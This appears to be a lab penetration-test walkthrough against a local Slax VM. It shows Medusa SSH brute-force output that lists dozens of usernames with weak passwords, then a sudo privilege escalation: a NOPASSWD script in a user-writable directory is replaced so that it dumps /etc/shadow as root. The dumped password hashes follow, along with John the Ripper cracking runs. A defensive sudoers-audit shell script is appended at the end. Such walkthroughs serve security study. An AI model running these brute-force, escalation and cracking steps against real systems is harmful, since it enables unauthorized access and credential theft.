ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jbresnahan (25 of 49, 24 complete) Password: Password (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jbresnahan Password: Password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jdavenport (26 of 49, 25 complete) Password: babyl0n (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jdavenport Password: babyl0n [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jduff (27 of 49, 26 complete) Password: trustno1 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jduff Password: trustno1 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jfranklin (28 of 49, 27 complete) Password: password (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jfranklin Password: password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kclemons (29 of 49, 28 complete) Password: killer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kclemons Password: killer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: krenfro (30 of 49, 29 complete) Password: gizmodo (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: krenfro Password: gizmodo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ktso (31 of 49, 30 complete) Password: computer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ktso Password: computer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kwebber (32 of 49, 31 complete) Password: lifehack (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kwebber Password: lifehack [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmartinez (33 of 49, 32 complete) Password: michelle (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmartinez Password: michelle [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmorales (34 of 49, 33 complete) Password: master (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmorales Password: master [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mbryan (35 of 49, 34 complete) Password: pepper (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mbryan Password: pepper [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mholland (36 of 49, 35 complete) Password: baseball (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mholland Password: baseball [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mnader (37 of 49, 36 complete) Password: soccer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mnader Password: soccer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mrodriguez (38 of 49, 37 complete) Password: jordan (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mrodriguez Password: jordan [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: myajima (39 of 49, 38 complete) Password: 12345 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: myajima Password: 12345 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: qpowers (40 of 49, 39 complete) Password: 12345678 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: qpowers Password: 12345678 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rdominguez (41 of 49, 40 complete) Password: gawker (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rdominguez Password: gawker [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rjacobson (42 of 49, 41 complete) Password: internet (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rjacobson Password: internet [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rpatel (43 of 49, 42 complete) Password: 0 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rpatel Password: 0 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sgains (44 of 49, 43 complete) Password: batman (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sgains Password: batman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sjohnson (45 of 49, 44 complete) Password: football (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sjohnson Password: football [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: strammel (46 of 49, 45 complete) Password: dragon (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: strammel Password: dragon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: swarren (47 of 49, 46 complete) Password: shadow (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: swarren Password: shadow [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tdeleon (48 of 49, 47 complete) Password: qwerty (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tdeleon Password: qwerty [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tgoodchap (49 of 49, 48 complete) Password: letmein (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tgoodchap Password: letmein [SUCCESS]
GENERAL: Medusa has finished.
root@kali:~# ssh aadams@192.168.1.120
aadams@192.168.1.120's password:
Linux 2.6.27.27.
aadams@slax:~$
aadams@slax:~$ uname -a
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel GNU/Linux
aadams@slax:~$ id
uid=1005(aadams) gid=100(users) groups=100(users)
aadams@slax:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Sorry, user aadams may not run sudo on slax.
aadams@slax:~$
aadams@slax:~$ cat /etc/group
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root
video:x:18:root
cdrom:x:19:root
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
tape:x:26:root
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root
power:x:84:
pop:x:90:pop
scanner:x:93:
nobody:x:98:nobody
nogroup:x:99:
users:x:100:ccoffee
console:x:101:
admin:x:102:ccoffee
root@kali:~# ssh ccoffee@192.168.1.120
ccoffee@192.168.1.120's password:
Linux 2.6.27.27.
ccoffee@slax:~$
ccoffee@slax:~$ ls -al
total 12
drwx------ 3 ccoffee users 120 Jan 13 10:20 ./
dr-xr-xr-x 53 root root 1040 Jan 13 10:20 ../
-rwx------ 1 ccoffee users 3729 Jan 13 10:20 .screenrc*
-rwx------ 1 ccoffee users 779 Jan 13 10:20 .xsession*
-rwx------ 1 ccoffee users 57 Jan 13 10:20 DONOTFORGET*
drwx------ 2 ccoffee users 60 Jan 13 10:20 scripts/
ccoffee@slax:~$ ls -al scripts/
total 4
drwx------ 2 ccoffee users 60 Jan 13 10:20 ./
drwx------ 3 ccoffee users 120 Jan 13 10:20 ../
-rws--x--x 1 root admin 110 Jan 13 10:20 getlogs.sh*
ccoffee@slax:~$ cat scripts/getlogs.sh
cat: scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo cat scripts/getlogs.sh
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Sorry, user ccoffee is not allowed to execute '/usr/bin/cat scripts/getlogs.sh' as root on slax.
ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
(root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh
ccoffee@slax:~$ /home/ccoffee/scripts/getlogs.sh
/bin/bash: /home/ccoffee/scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo /home/ccoffee/scripts/getlogs.sh
wrong!
ccoffee@slax:~$ cd scripts
ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ vi getlogs.sh
#!/bin/bash
whoami
id
cat /etc/shadow
ccoffee@slax:~/scripts$ chmod 744 getlogs.sh
ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev)
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
root@kali:~# john shadow1
Loaded 50 password hashes with 50 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
qwerty (tdeleon)
12345 (myajima)
password (jfranklin)
123456 (amaynard)
computer (ktso)
12345678 (qpowers)
abc123 (dgilfillan)
internet (rjacobson)
shadow (swarren)
baseball (mholland)
letmein (tgoodchap)
michael (jayala)
dragon (strammel)
michelle (lmartinez)
jordan (mrodriguez)
trustno1 (jduff)
soccer (mnader)
football (sjohnson)
batman (sgains)
iloveyou (bbanter)
pepper (mbryan)
jennifer (dstevens)
master (lmorales)
monkey (aspears)
sunshine (bphillips)
whatever (aadams)
welcome (hlovell)
111111 (djohnson)
666666 (jalvarez)
654321 (aheflin)
killer (kclemons)
princess (ccoffee)
superman (bwatkins)
123123 (aweiland)
1234567 (cchisholm)
cheese (dgrant)
starwars (dtraylor)
Password (jbresnahan)
nintendo (aallen)
passw0rd (aharp)
blahblah (dwestling)
pokemon (jalcantar)
0 (rpatel)
guesses: 43 time: 0:00:01:34 0.00% (3) c/s: 29442 trying: markey10 - marketio
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
root@kali:~# cat shadow2
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/darkc0de.lst
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0 time: 0:00:00:50 DONE (Mon Jan 13 13:22:46 2014) c/s: 29222 trying: �migr� - �f
root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0 time: 0:00:08:10 DONE (Mon Jan 13 13:32:19 2014) c/s: 29211 trying: 123d - * 7¡Vamos!
That's all.
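
The escalation in the transcript works because the sudoers entry for ccoffee names a script inside a directory that ccoffee controls, so the file can be renamed and replaced before sudo runs it. The following audit is an added example, not part of the original post: it lists sudoers commands whose file or any parent directory is not root-owned or is group/world-writable. `TRUSTED_UID`, `AUDIT_ROOT`, the function names and the demo tree are assumptions made here; `stat -L -c` is the GNU/busybox form.

```shell
#!/bin/sh
# Added example: flag sudoers commands that someone other than root could replace.
# TRUSTED_UID and AUDIT_ROOT are assumed knobs so the demo can run unprivileged.
TRUSTED_UID=${TRUSTED_UID:-0}
AUDIT_ROOT=${AUDIT_ROOT:-/}

# Print the absolute command paths granted by sudoers-style text on stdin.
sudoers_commands() {
  sed -e '/^[[:space:]]*Defaults/d' -e 's/#.*//' -e 's/^[^=]*=//' \
      -e 's/([^)]*)//g' -e 's/[A-Z_][A-Z_]*://g' |
    tr ',' '\n' | awk '$1 ~ /^\// { print $1 }'
}

# Walk from the command up to AUDIT_ROOT; print the first component that is not
# owned by TRUSTED_UID or is group/world-writable. Returns 0 when one is found.
weak_component() {
  p=$1
  while :; do
    if st=$(stat -L -c '%u %a' -- "$p" 2>/dev/null); then
      if [ "${st% *}" != "$TRUSTED_UID" ] || [ $(( 0${st#* } & 022 )) -ne 0 ]; then
        printf '%s\n' "$p"; return 0
      fi
    fi
    if [ "$p" = "$AUDIT_ROOT" ] || [ "$p" = / ]; then return 1; fi
    p=$(dirname -- "$p")
  done
}

# Read sudoers text on stdin; report replaceable commands; return 1 on findings.
audit_sudoers() {
  rc=0
  for cmd in $(sudoers_commands); do   # paths containing spaces are not handled
    if weak=$(weak_component "$cmd"); then
      printf 'REPLACEABLE %s via %s\n' "$cmd" "$weak"; rc=1
    fi
  done
  return $rc
}

# Constructed tree: a world-writable scripts/ stands in for the user-owned
# ~/scripts of the transcript, next to a locked-down install location.
demo() {
  umask 022; AUDIT_ROOT=$(mktemp -d); TRUSTED_UID=$(id -u)
  mkdir -p "$AUDIT_ROOT/home/ccoffee/scripts" "$AUDIT_ROOT/usr/local/sbin"
  touch "$AUDIT_ROOT/home/ccoffee/scripts/getlogs.sh" "$AUDIT_ROOT/usr/local/sbin/getlogs.sh"
  chmod 755 "$AUDIT_ROOT"; chmod 777 "$AUDIT_ROOT/home/ccoffee/scripts"
  printf '%s\n' "ccoffee ALL=(root) NOPASSWD: $AUDIT_ROOT/home/ccoffee/scripts/getlogs.sh" \
    "ccoffee ALL=(root) NOPASSWD: $AUDIT_ROOT/usr/local/sbin/getlogs.sh" | audit_sudoers
  rc=$?; rm -rf "$AUDIT_ROOT"; return $rc
}
[ "${1:-}" != demo ] || demo
```

On a real host, run `audit_sudoers < /etc/sudoers` as root with the defaults; any reported command should be moved to a root-owned path whose parent directories are also root-owned and not writable by others.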